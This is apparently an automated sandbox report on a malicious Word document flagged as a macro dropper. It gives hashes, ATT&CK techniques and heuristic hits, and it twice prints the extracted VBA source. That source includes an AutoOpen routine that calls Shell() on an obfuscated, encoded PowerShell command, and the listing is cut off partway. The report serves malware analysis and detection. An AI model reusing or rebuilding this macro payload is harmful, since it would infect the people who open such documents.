Office (OLE) malware analysis — malicious · 3e0ee7c4e6bf9b8f

MALICIOUS

Office (OLE)

97.5 KB Created: 2018-06-12 17:22:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: 0023bcd631d0684bd3e5bf07ddc5e4ca SHA-1: fce0665a5c7102aa18d7e85792d1f6c262bf09a5 SHA-256: 3e0ee7c4e6bf9b8f14a5448b1d2156a8a489ae80b0b9bb6c205b79b2bc93a2e0

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen subroutine within the VBA code calls a function that uses the Shell() command, indicating an attempt to execute arbitrary code. This is further supported by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The specific command executed by Shell() is obfuscated but the presence of the function call itself is a critical indicator of malicious intent.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6582920-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6582920-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12730 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12730 bytes
SHA-256: `34c1e3edff6040fa3238d2fd0e1163fff5e26c77ead2c4e3ae90b56e6a2c327b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WXdpdICziHHD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function ckLZYU() On Error Resume Next zYOWVB = Tan(21204) HMpmcC = jpowo YMsWE = CDbl(TZTEU) wVjrRz = zrbiV XfLEj = Hex(FSubL * ChrW(AQirK + Int(HUvjjm * Rnd(85094)) * pwpMw * Log(58907 * NjnHU - kPYBuX + Fix(51)))) QiTHj = Tan(76001) ANqzZM = Tan(13971) Idiihw = kvkpAX WflOW = CDbl(GchfJ) WApnh = jFGvT pWizX = Hex(qmCvq * ChrW(NKpzY + Int(vCUccm * Rnd(89941)) * DjUSz * Log(52715 * VYAdJ - KoWCb + Fix(51)))) iaWTj = Tan(64041) ckLZYU = DhbDLTI + Shell(RQcAwz + Chr(JiRstaRPXw + vbKeyP + AiOjzuDAR) + "owers" + KaBvOPQlMSz + kQjwNPP + nifDwHm + svzbnK + LJPmoZGA, 14365 - 14365) zQvNtr = Tan(5874) TJSkv = zslpV alNwa = CDbl(dQhjN) lYcvZL = lFprf Rftih = Hex(iKSzNC * ChrW(msOmim + Int(izXnDT * Rnd(50136)) * kJluiu * Log(16859 * jlzwj - SYOscZ + Fix(51)))) XTGEi = Tan(48378) End Function Sub Autoopen() On Error Resume Next HGbOK = Tan(90331) JOTUCd = iAiqM jwZKq = CDbl(VMpfp) VpOdKk = oCJKuY vrsTXO = Hex(XmJhQ * ChrW(JZNTj + Int(UjnIAp * Rnd(96152)) * YwWoi * Log(73216 * FiUWH - dwDEwu + Fix(51)))) bOppa = Tan(30315) ckLZYU tHird = Tan(49002) zYPUC = IEvtzb rikDE = CDbl(ldJJhO) hWzvc = iRfZnk QEWTvs = Hex(MMLXfn * ChrW(ofoPiG + Int(wmHzRE * Rnd(88173)) * LJwSKi * Log(62739 * pNoPC - KZPoK + Fix(51)))) lrKEiG = Tan(39020) End Sub Attribute VB_Name = "OUinEaBCa" Function KaBvOPQlMSz() On Error Resume Next DppnNo = Tan(95376) wGjnK = aXDvTw QVYrw = CDbl(pOkjzw) FYKQi = kKwrw zVqVRP = Hex(komTQ * ChrW(RpIHOZ + Int(qqYCNm * Rnd(24833)) * NtSic * Log(89183 * dwtSRd - fSEtU + Fix(51)))) RcDjR = Tan(22865) BpTEstuZ = "HeLL -e aQBOAFY" + "ATwBr" + "AGUALQBlAHgAc" + "ABSAGUAcwBzA" + "GkATwBO" + "ACAAKABuA" GwoIf = Tan(4131) XuToo = SMJNw HfLFz = CDbl(Svukq) NQoshK = nPSokz FSwFS = Hex(mJEaur * ChrW(oMGPmE + Int(bXNaiz * Rnd(54301)) * soqbG * Log(64991 * AwpRB - DMNzpT + Fix(51)))) aJDBfO = Tan(77357) vSYDhOw = "GUAdw" + "AtAE" + "8AQgBKAGUA" + "YwBUA" + "CAAIABJAG8ALgB" FXaTNd = Tan(33000) jTkIa = JZUCn Lzdpf = CDbl(ijkpvr) juYPwo = mvdiE XOzdj = Hex(bQWFul * ChrW(iuifuX + Int(PtRkKW * Rnd(28039)) * kPVwk * Log(40043 * UjHIS - dKoii + Fix(51)))) GZEQi = Tan(13680) RwYGTYK = "jAE8" + "ATQBwAHI" + "AZQBzA" + "FMASQBP" + "AG4ALgBEAG" + "UAZgBMA" + "EEAVABlAHMAVAB" + "yAEUAYQ" + "BNACg" + "AWwBzAHkAUwB0" vdwOT = Tan(20189) HfHkw = TaawY EdmjcG = CDbl(MIujwm) YZiXUo = EHzDEi rjwGsv = Hex(hJuUI * ChrW(wGNzIz + Int(ctwDd * Rnd(69028)) * AVofXY * Log(6644 * cwaGr - qQjCMB + Fix(51)))) zuwuHd = Tan(882) IfDBIBPw = "AGUAbQAu" + "AEkATwAuAE0AZ" + "QBtAG8AcgB5" + "AFMAVAB" + "yAGU" jvcIGB = Tan(23385) Owjjd = RYBGPl MARiqC = CDbl(qlQvCX) Azzkni = UGcSWT ZsBOOT = Hex(uLaQw * ChrW(ddjojF + Int(QbEVbH * Rnd(64798)) * toQUiz * Log(32797 * OjoEVF - XUotRr + Fix(51)))) omQiNw = Tan(78006) pbtTz = "AYQBNAF0" + "AIABbA" + "HMAW" + "QBzAHQARQBNAC4" mHmiBX = Tan(19486) PnMlRH = BQKojB NPBTzi = CDbl(AjSDi) jSqEPN = ZFFFI uPSDJH = Hex(ztWdhX * ChrW(tPEuhj + Int(LjZFZ * Rnd(37488)) * NIKvKT * Log(68917 * ijIvDu - vNXshi + Fix(51)))) BKYZS = Tan(67588) kYXEFjsuzZ = "AQ" + "wBvAE4AVgBF" + "AH" + "IAVABdADoAO" + "gBGAHI" KaBvOPQlMSz = BpTEstuZ + vSYDhOw + RwYGTYK + IfDBIBPw + pbtTz + kYXEFjsuzZ End Function Function kQjwNPP() On Error Resume Next tzkoCm = Tan(71406) iWDwF = XllfTX MijmwD = CDbl(zXlAA) piYHB = CkfAo ZcdZmt = Hex(LtjPDB * ChrW(idMKl + Int(vwspN * Rnd(57661)) * KVDhhs * Log(2534 * biZls - pNITU + Fix(51)))) zaYYU = Tan(29774) zzZRbUfmVKB = "Abw" + "BNAEIAYQ" + "BzAEUA" + "NgA" + "0AFMA" + "dABSAEkAbgBnACg" + "AIAAnAFYAWgBE" + "AG" + "IAVABz" + "AE" pakoMI = Tan(28121) ppzhLA = GzmZsB ljVsY = CDbl(kzfMSG) wqpNc = MzXIlJ RTYmv = Hex(kjoAS * ChrW(kjEsK + Int(PEojPJ * Rnd(47649)) * PoGNbk * Log(68177 * QRYtR - WcJqXt + Fix(51)))) wIHMVW = Tan(8526) lbzRQGRXfjk = "oAQQBFAEk ... (truncated)

SHA-256: 34c1e3edff6040fa3238d2fd0e1163fff5e26c77ead2c4e3ae90b56e6a2c327b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "WXdpdICziHHD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ckLZYU()
On Error Resume Next
zYOWVB = Tan(21204)
HMpmcC = jpowo
YMsWE = CDbl(TZTEU)
wVjrRz = zrbiV
XfLEj = Hex(FSubL * ChrW(AQirK + Int(HUvjjm * Rnd(85094)) * pwpMw * Log(58907 * NjnHU - kPYBuX + Fix(51))))
QiTHj = Tan(76001)
ANqzZM = Tan(13971)
Idiihw = kvkpAX
WflOW = CDbl(GchfJ)
WApnh = jFGvT
pWizX = Hex(qmCvq * ChrW(NKpzY + Int(vCUccm * Rnd(89941)) * DjUSz * Log(52715 * VYAdJ - KoWCb + Fix(51))))
iaWTj = Tan(64041)
ckLZYU = DhbDLTI + Shell(RQcAwz + Chr(JiRstaRPXw + vbKeyP + AiOjzuDAR) + "owers" + KaBvOPQlMSz + kQjwNPP + nifDwHm + svzbnK + LJPmoZGA, 14365 - 14365)
zQvNtr = Tan(5874)
TJSkv = zslpV
alNwa = CDbl(dQhjN)
lYcvZL = lFprf
Rftih = Hex(iKSzNC * ChrW(msOmim + Int(izXnDT * Rnd(50136)) * kJluiu * Log(16859 * jlzwj - SYOscZ + Fix(51))))
XTGEi = Tan(48378)
End Function
Sub Autoopen()
On Error Resume Next
HGbOK = Tan(90331)
JOTUCd = iAiqM
jwZKq = CDbl(VMpfp)
VpOdKk = oCJKuY
vrsTXO = Hex(XmJhQ * ChrW(JZNTj + Int(UjnIAp * Rnd(96152)) * YwWoi * Log(73216 * FiUWH - dwDEwu + Fix(51))))
bOppa = Tan(30315)
ckLZYU
tHird = Tan(49002)
zYPUC = IEvtzb
rikDE = CDbl(ldJJhO)
hWzvc = iRfZnk
QEWTvs = Hex(MMLXfn * ChrW(ofoPiG + Int(wmHzRE * Rnd(88173)) * LJwSKi * Log(62739 * pNoPC - KZPoK + Fix(51))))
lrKEiG = Tan(39020)
End Sub


Attribute VB_Name = "OUinEaBCa"
Function KaBvOPQlMSz()
On Error Resume Next
DppnNo = Tan(95376)
wGjnK = aXDvTw
QVYrw = CDbl(pOkjzw)
FYKQi = kKwrw
zVqVRP = Hex(komTQ * ChrW(RpIHOZ + Int(qqYCNm * Rnd(24833)) * NtSic * Log(89183 * dwtSRd - fSEtU + Fix(51))))
RcDjR = Tan(22865)
BpTEstuZ = "HeLL -e aQBOAFY" + "ATwBr" + "AGUALQBlAHgAc" + "ABSAGUAcwBzA" + "GkATwBO" + "ACAAKABuA"
GwoIf = Tan(4131)
XuToo = SMJNw
HfLFz = CDbl(Svukq)
NQoshK = nPSokz
FSwFS = Hex(mJEaur * ChrW(oMGPmE + Int(bXNaiz * Rnd(54301)) * soqbG * Log(64991 * AwpRB - DMNzpT + Fix(51))))
aJDBfO = Tan(77357)
vSYDhOw = "GUAdw" + "AtAE" + "8AQgBKAGUA" + "YwBUA" + "CAAIABJAG8ALgB"
FXaTNd = Tan(33000)
jTkIa = JZUCn
Lzdpf = CDbl(ijkpvr)
juYPwo = mvdiE
XOzdj = Hex(bQWFul * ChrW(iuifuX + Int(PtRkKW * Rnd(28039)) * kPVwk * Log(40043 * UjHIS - dKoii + Fix(51))))
GZEQi = Tan(13680)
RwYGTYK = "jAE8" + "ATQBwAHI" + "AZQBzA" + "FMASQBP" + "AG4ALgBEAG" + "UAZgBMA" + "EEAVABlAHMAVAB" + "yAEUAYQ" + "BNACg" + "AWwBzAHkAUwB0"
vdwOT = Tan(20189)
HfHkw = TaawY
EdmjcG = CDbl(MIujwm)
YZiXUo = EHzDEi
rjwGsv = Hex(hJuUI * ChrW(wGNzIz + Int(ctwDd * Rnd(69028)) * AVofXY * Log(6644 * cwaGr - qQjCMB + Fix(51))))
zuwuHd = Tan(882)
IfDBIBPw = "AGUAbQAu" + "AEkATwAuAE0AZ" + "QBtAG8AcgB5" + "AFMAVAB" + "yAGU"
jvcIGB = Tan(23385)
Owjjd = RYBGPl
MARiqC = CDbl(qlQvCX)
Azzkni = UGcSWT
ZsBOOT = Hex(uLaQw * ChrW(ddjojF + Int(QbEVbH * Rnd(64798)) * toQUiz * Log(32797 * OjoEVF - XUotRr + Fix(51))))
omQiNw = Tan(78006)
pbtTz = "AYQBNAF0" + "AIABbA" + "HMAW" + "QBzAHQARQBNAC4"
mHmiBX = Tan(19486)
PnMlRH = BQKojB
NPBTzi = CDbl(AjSDi)
jSqEPN = ZFFFI
uPSDJH = Hex(ztWdhX * ChrW(tPEuhj + Int(LjZFZ * Rnd(37488)) * NIKvKT * Log(68917 * ijIvDu - vNXshi + Fix(51))))
BKYZS = Tan(67588)
kYXEFjsuzZ = "AQ" + "wBvAE4AVgBF" + "AH" + "IAVABdADoAO" + "gBGAHI"
KaBvOPQlMSz = BpTEstuZ + vSYDhOw + RwYGTYK + IfDBIBPw + pbtTz + kYXEFjsuzZ
End Function
Function kQjwNPP()
On Error Resume Next
tzkoCm = Tan(71406)
iWDwF = XllfTX
MijmwD = CDbl(zXlAA)
piYHB = CkfAo
ZcdZmt = Hex(LtjPDB * ChrW(idMKl + Int(vwspN * Rnd(57661)) * KVDhhs * Log(2534 * biZls - pNITU + Fix(51))))
zaYYU = Tan(29774)
zzZRbUfmVKB = "Abw" + "BNAEIAYQ" + "BzAEUA" + "NgA" + "0AFMA" + "dABSAEkAbgBnACg" + "AIAAnAFYAWgBE" + "AG" + "IAVABz" + "AE"
pakoMI = Tan(28121)
ppzhLA = GzmZsB
ljVsY = CDbl(kzfMSG)
wqpNc = MzXIlJ
RTYmv = Hex(kjoAS * ChrW(kjEsK + Int(PEojPJ * Rnd(47649)) * PoGNbk * Log(68177 * QRYtR - WcJqXt + Fix(51))))
wIHMVW = Tan(8526)
lbzRQGRXfjk = "oAQQBFAEk
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.